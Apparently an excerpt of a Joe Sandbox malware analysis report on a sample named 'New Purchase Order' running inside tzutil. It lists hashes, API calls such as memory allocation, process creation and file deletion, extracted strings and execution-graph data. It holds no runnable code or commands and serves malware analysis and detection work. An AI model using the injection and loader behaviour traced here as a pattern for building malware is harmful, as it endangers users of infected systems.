                                                          • Opcode ID: 8a6192138eb7b4ae2efb821b7189b47f805d32f5d71dd258bcbb3a0b25453199
                                                          • Instruction ID: 4d3167c77c6673fbc8c3c580674b83c2fbf2e208ca5222a4b6155c4e6c12afaa
                                                          • Opcode Fuzzy Hash: 8a6192138eb7b4ae2efb821b7189b47f805d32f5d71dd258bcbb3a0b25453199
                                                          • Instruction Fuzzy Hash: 7A51F73160021EBAEF21AAACDC89FE977A9AF14704F1400A9D605E7281E771EB45CF51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-$0$0
                                                          • API String ID: 1302938615-699404926
                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction ID: b009429e75514f5ce74d1bcc7dfc8c61d55a91e9c7891159697840acc48aa77f
                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                          • Instruction Fuzzy Hash: 1B81E070E1524A8FEF25FE6CC8917FEBBB1AFC5364F184219D861E7291C7349A408B51
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$[$]:%u
                                                          • API String ID: 48624451-2819853543
                                                          • Opcode ID: af8c63dd7bb3336869e3018dd73eef3ffad94a8c34610e728ed1d754e1a56a15
                                                          • Instruction ID: 746319fbaea25e6cd9c0d1ff06c149a330c8da8cdfc347c632c91c947a9153ec
                                                          • Opcode Fuzzy Hash: af8c63dd7bb3336869e3018dd73eef3ffad94a8c34610e728ed1d754e1a56a15
                                                          • Instruction Fuzzy Hash: 9521537AA00519ABDB11DE6DCC40AEE7BE9AF54744F48012AEA05D3200E730EB418BA5
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018B02BD
                                                          • RTL: Re-Waiting, xrefs: 018B031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018B02E7
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: 09a6bcb40b1ea1fb9297f4e9efe9430fab0794d42c4677ed3ff92315b26c1937
                                                          • Instruction ID: a2c829073d5ad15376ee73883fb9b39ecd1bc276c4e1eb1bc946636b478a6756
                                                          • Opcode Fuzzy Hash: 09a6bcb40b1ea1fb9297f4e9efe9430fab0794d42c4677ed3ff92315b26c1937
                                                          • Instruction Fuzzy Hash: 86E1BC306087429FE725CF2CD894B6ABBE4AB88314F140A5DF6A5CB3D1D774DA44CB42
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018B7B7F
                                                          • RTL: Re-Waiting, xrefs: 018B7BAC
                                                          • RTL: Resource at %p, xrefs: 018B7B8E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 0-871070163
                                                          • Opcode ID: 41de752249df0404783d29a9f2e165e244ea5ea859688e3e005f549750a0f080
                                                          • Instruction ID: 127648429defc3a08f132e949ed1bccf7b6a298ee3ea646183ae330945db2884
                                                          • Opcode Fuzzy Hash: 41de752249df0404783d29a9f2e165e244ea5ea859688e3e005f549750a0f080
                                                          • Instruction Fuzzy Hash: 9841E7313047069FD725DE29C880B6AB7E6EF99B10F100A1DF95AD7780DB31E6058F91
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018B728C
                                                          Strings
                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018B7294
                                                          • RTL: Re-Waiting, xrefs: 018B72C1
                                                          • RTL: Resource at %p, xrefs: 018B72A3
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-605551621
                                                          • Opcode ID: 1f7b673842fe289d5fc4463428f09e35c89264eed53b43c9f94def0c9ff42092
                                                          • Instruction ID: 9c975267ecdc615fd2169b0cd15fd4868fe27ff3ccf037f0e9fa7be288ddbaa6
                                                          • Opcode Fuzzy Hash: 1f7b673842fe289d5fc4463428f09e35c89264eed53b43c9f94def0c9ff42092
                                                          • Instruction Fuzzy Hash: 0941E231700706ABD721DE29CC81BAAB7A6FF95714F140619F956EB380DB31FA4287D1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: cfc7584fb11e8d378692bfa499d8385cc40895c84172557da023d1fa43981488
                                                          • Instruction ID: ee231af13d78fc5de123d036064a1b9dd5e67dd22bffe585c7f989c17715678a
                                                          • Opcode Fuzzy Hash: cfc7584fb11e8d378692bfa499d8385cc40895c84172557da023d1fa43981488
                                                          • Instruction Fuzzy Hash: AC316472A006199FDB20DE2DCC40BEEB7F9FB54710F44455AE949E3240EB30EB448BA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction ID: 71879c28aaa30ac8f3eb10d791b491f6cffeb9f1cc396c31cf871a75caaefcad
                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                          • Instruction Fuzzy Hash: 8991B271E0021A9BEB24FF6EC8806BEBBB5EF45720F74451AE955E72C4D7309B418B21
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: db73b40a0214eebd127661224e98ed0d3a0a5ce5fc032fd264fcc33c2a330c02
                                                          • Instruction ID: f4f82ea8dc78f9143f853cd69e1442e3bffbbf82ca1fb5d41624ac94d62a9141
                                                          • Opcode Fuzzy Hash: db73b40a0214eebd127661224e98ed0d3a0a5ce5fc032fd264fcc33c2a330c02
                                                          • Instruction Fuzzy Hash: 0D810A71D012699BDB358B58CC44BEAB7B9AB48754F0041EAEA19F7240D7709F84CFA1
                                                          APIs
                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 018CCFBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CallFilterFunc@8
                                                          • String ID: @$@4_w@4_w
                                                          • API String ID: 4062629308-713214301
                                                          • Opcode ID: b6919ff2f4029a593c70c6d1c70f0482d3cf01ca72580bfd72cf6b6f2b5e3bf1
                                                          • Instruction ID: be1d780f5a38f05e7949f6c815b2dca7a012ab201feae5c371ac4c221620c34c
                                                          • Opcode Fuzzy Hash: b6919ff2f4029a593c70c6d1c70f0482d3cf01ca72580bfd72cf6b6f2b5e3bf1
                                                          • Instruction Fuzzy Hash: 06419071900219DFDB21EFADC840AAEBBB8FF95B40F00412EE915DB254E774DA41CBA5

                                                          Execution Graph

                                                          Execution Coverage:2.5%
                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                          Signature Coverage:2.3%
                                                          Total number of Nodes:444
                                                          Total number of Limit Nodes:70
NtAllocateVirtualMemory 102078->102079 102081 1e3e51 102079->102081 102080 1e3f50 102080->102076 102081->102080 102082 1d4990 LdrLoadDll 102081->102082 102084 1e3e91 102082->102084 102083 1e3ed2 Sleep 102083->102084 102084->102080 102084->102083 102085 1ec8f0 102086 1eb7f0 RtlFreeHeap 102085->102086 102087 1ec905 102086->102087 102093 1d276c 102094 1d2702 102093->102094 102095 1d271b 102094->102095 102096 1e9810 LdrInitializeThunk 102094->102096 102096->102095 101824 1d2ba5 101825 1d66d0 2 API calls 101824->101825 101826 1d2bd0 101825->101826 101828 1c9f20 101830 1c9f2f 101828->101830 101829 1c9f6d 101830->101829 101831 1c9f5a CreateThread 101830->101831 102097 1cb960 102098 1eb760 NtAllocateVirtualMemory 102097->102098 102099 1ccfd1 102097->102099 102098->102099 101832 1d7720 101833 1d778f 101832->101833 101834 1d7738 101832->101834 101834->101833 101836 1db660 101834->101836 101838 1db686 101836->101838 101837 1db8b3 101837->101833 101838->101837 101863 1e9b50 101838->101863 101840 1db6f9 101840->101837 101841 1ec9c0 2 API calls 101840->101841 101842 1db718 101841->101842 101842->101837 101843 1db7ec 101842->101843 101844 1e8e30 LdrInitializeThunk 101842->101844 101845 1d5f50 LdrInitializeThunk 101843->101845 101847 1db80b 101843->101847 101846 1db77a 101844->101846 101845->101847 101846->101843 101850 1db783 101846->101850 101851 1db89b 101847->101851 101869 1e89a0 101847->101869 101848 1db7d4 101852 1d8500 LdrInitializeThunk 101848->101852 101849 1db7b2 101884 1e4ae0 LdrInitializeThunk 101849->101884 101850->101837 101850->101848 101850->101849 101866 1d5f50 101850->101866 101853 1d8500 LdrInitializeThunk 101851->101853 101857 1db7e2 101852->101857 101858 1db8a9 101853->101858 101857->101833 101858->101833 101859 1db872 101874 1e8a50 101859->101874 101861 1db88c 101879 1e8bb0 101861->101879 101864 1e9b6d 101863->101864 101865 1e9b7e CreateProcessInternalW 101864->101865 101865->101840 101885 1e8ff0 101866->101885 101868 1d5f8b 101868->101849 101870 1e89cb 
101869->101870 101871 1e8a1d 101869->101871 101870->101859 101891 2cb39b0 LdrInitializeThunk 101871->101891 101872 1e8a3f 101872->101859 101875 1e8ad0 101874->101875 101877 1e8a7e 101874->101877 101892 2cb4340 LdrInitializeThunk 101875->101892 101876 1e8af2 101876->101861 101877->101861 101880 1e8c30 101879->101880 101882 1e8bde 101879->101882 101893 2cb2fb0 LdrInitializeThunk 101880->101893 101881 1e8c52 101881->101851 101882->101851 101884->101848 101886 1e90a1 101885->101886 101888 1e901f 101885->101888 101890 2cb2d10 LdrInitializeThunk 101886->101890 101887 1e90e3 101887->101868 101888->101868 101890->101887 101891->101872 101892->101876 101893->101881 101894 1d71a0 101895 1d71ca 101894->101895 101898 1d8330 101895->101898 101897 1d71f1 101899 1d834d 101898->101899 101905 1e8f10 101899->101905 101901 1d839d 101902 1d83a4 101901->101902 101903 1e8ff0 LdrInitializeThunk 101901->101903 101902->101897 101904 1d83cd 101903->101904 101904->101897 101906 1e8fab 101905->101906 101907 1e8f3b 101905->101907 101910 2cb2f30 LdrInitializeThunk 101906->101910 101907->101901 101908 1e8fe1 101908->101901 101910->101908 102100 1d11e0 102101 1d11fa 102100->102101 102102 1d4990 LdrLoadDll 102101->102102 102103 1d1215 102102->102103 102104 1d1249 PostThreadMessageW 102103->102104 102105 1d125a 102103->102105 102104->102105 102106 1e8c60 102107 1e8cf2 102106->102107 102109 1e8c8e 102106->102109 102111 2cb2ee0 LdrInitializeThunk 102107->102111 102108 1e8d20 102111->102108 102112 1e96e0 102113 1e970b 102112->102113 102114 1e9757 102112->102114 102115 1e976a NtDeleteFile 102114->102115 102116 1e8de0 102117 1e8dfa 102116->102117 102120 2cb2df0 LdrInitializeThunk 102117->102120 102118 1e8e1f 102120->102118

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                          • API String ID: 0-3230942322
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 001DCAB1
                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 001DCAEE
                                                          • FindClose.KERNELBASE(?), ref: 001DCAF9
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          APIs
                                                          • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 001E957B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 001E96D6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(001D21AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,001E82FF,001D21AE), ref: 001E99A8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          APIs
                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 001E97B1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2615477604.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C40000, based on PE: true
                                                          • Associated: 00000008.00000002.2615477604.0000000002D69000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002D6D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000008.00000002.2615477604.0000000002DDE000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_2c40000_tzutil.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0

                                                          Control-flow Graph

                                                          control_flow_graph 429 1d114d-1d1158 430 1d11d8-1d1247 call 1eb890 call 1ec2a0 call 1d4990 call 1c13e0 call 1e2000 429->430 431 1d115a-1d1166 429->431 445 1d1249-1d1258 PostThreadMessageW 430->445 446 1d1267-1d126d 430->446 432 1d1168 431->432 433 1d11c3-1d11d4 431->433 432->433 445->446 447 1d125a-1d1264 445->447 447->446
                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 001D1254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: 0ad50afb7131ff32622f72e95fb27a8185b8d4c58e7a834c29b618615f7c36a3
                                                          • Instruction ID: 35a0a4cf9f4a272624b2de07a314b211ef63b58ca5f9bbb58bf6b5648d4e1701
                                                          • Opcode Fuzzy Hash: 0ad50afb7131ff32622f72e95fb27a8185b8d4c58e7a834c29b618615f7c36a3
                                                          • Instruction Fuzzy Hash: 0621F672A0424D7EEB01AE959C82DEFBB7CEF51394F04416AF904AB241D7259E068BE1

                                                          Control-flow Graph

                                                          control_flow_graph 448 1d11d6-1d1247 call 1eb890 call 1ec2a0 call 1d4990 call 1c13e0 call 1e2000 460 1d1249-1d1258 PostThreadMessageW 448->460 461 1d1267-1d126d 448->461 460->461 462 1d125a-1d1264 460->462 462->461
                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 001D1254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: 62b292c3c3ca90a3d03e3c875e4c1b8689c76b4a674dae31fd32f42cb8c9fed4
                                                          • Instruction ID: 4a01c8df0830ae14ea6bdc73fafa58c68e1f151e19ee680879994765490149c6
                                                          • Opcode Fuzzy Hash: 62b292c3c3ca90a3d03e3c875e4c1b8689c76b4a674dae31fd32f42cb8c9fed4
                                                          • Instruction Fuzzy Hash: ED118EB690024D7AAB10AAE54CC2DEFBB6CDF51794F048159FA14B7241D6389E068BA1

                                                          Control-flow Graph

                                                          control_flow_graph 463 1d11e0-1d1247 call 1eb890 call 1ec2a0 call 1d4990 call 1c13e0 call 1e2000 474 1d1249-1d1258 PostThreadMessageW 463->474 475 1d1267-1d126d 463->475 474->475 476 1d125a-1d1264 474->476 476->475
                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 001D1254
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416
                                                          • Opcode ID: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                          • Instruction ID: 31282635f2f032ae9dab82db0e49b9cd3d79fdb8c6a1ecfa5c9431549ac14e41
                                                          • Opcode Fuzzy Hash: f03869fda7b0d1a7782fc448fc1cae66ffdd3959067e50402559fb878f61b7a5
                                                          • Instruction Fuzzy Hash: C30180B2D0024D7BEB10ABE59C82DEF7B7C9F51794F048069FA14B7241D7385E068BA1
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 001E3EDD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 9f740d79c788470d887b3227eaab9aa7a109ce6250c2a78a7db5aa02bcc623de
                                                          • Instruction ID: 33a865681564b47ae0766db15f54e41f7c6e707ddf7c33b123c41b347262480c
                                                          • Opcode Fuzzy Hash: 9f740d79c788470d887b3227eaab9aa7a109ce6250c2a78a7db5aa02bcc623de
                                                          • Instruction Fuzzy Hash: F5318DB1A01606BBD714DFA5CC84FEBBBB9EB88700F00411DF62D5B241C774AA00CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                          • Instruction ID: 4662dbdb0342f7ff88c8b35971fd77c9cbdbd55600a1ecfc099558460470041e
                                                          • Opcode Fuzzy Hash: e3ac8dca9d4a5e2f21f3405cabb02933aee54d61612d24bb33dfc2b886692964
                                                          • Instruction Fuzzy Hash: E4311076A0060AAFDB14DF98C8809EFB7B9FF88304B108559E506A7314D775AE458BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                          • Instruction ID: 60881cc71807e6935ca536b577f7b0f184bfc1ba158fd6c8b8a9e586caa52704
                                                          • Opcode Fuzzy Hash: 1f689e5722081d79dd2b489bdd5053e9c44b1b93b73407c68c5540e258936cf8
                                                          • Instruction Fuzzy Hash: CC311275A0060AAFDB04DFD9C8809EFB7B9BF88304B108559E506A7314D775AE058BA0
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2610067851.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1c0000_tzutil.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
                                                          • Instruction ID: 4ac6a0a67d49038262b23c6c5415c3bb5cef93cce039ccb64e3db00b73a3cb50
                                                          • Opcode Fuzzy Hash: 59613f67ab0b44fc569472441be565e37fa422d4333c6dd1dd2efb647779117c
